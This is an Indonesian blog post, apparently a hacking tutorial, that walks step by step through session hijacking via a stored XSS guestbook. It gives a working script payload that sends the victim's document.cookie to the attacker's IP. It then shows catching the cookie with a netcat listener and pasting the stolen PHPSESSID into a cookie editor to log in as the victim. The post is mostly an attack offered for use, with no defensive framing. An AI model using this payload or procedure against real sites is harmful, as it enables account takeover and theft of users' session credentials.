Penulis Hi, kali ini saya akan melakukan Session Hijacking dengan cara mencuri cookie pertama tama saya akan membuka halaman XSS Storednya
kemudian saya akan mencari tau ip saya
kemudian saya masukan script ini
<script>new Image().src="http://[ip address mu]/pizza.php?"+ document.cookie;</script>Note : Pizza.php gak perlu ada
kemudian kita tekan sign guest book
kemudian saya akan log out
set listener dengan memasukan netcat -lvp (port)
Tips : anda juga bisa mengganti netcat menjadi nc
kemudian korban akan melogin
setelah itu korban membuka halaman yang terdapat script kita tadi
saya menggunakan ekstensi cookie inspector di chrome kemudian menekan [CTRL]+[SHIFT]+[J]
click kanan pada cookie PHPSESSID
copy PHPSESSID kita di terminal
click kanan kemudian tekan edit, terus masukan value cookie kita
buka halaman nya lagi kemudian kita terlogin
Note: kalo gak login coba buka filenya yang didalam
sekian keep calm and keep using green font, cause hacker does that
EmoticonEmoticon
Note: only a member of this blog may post a comment.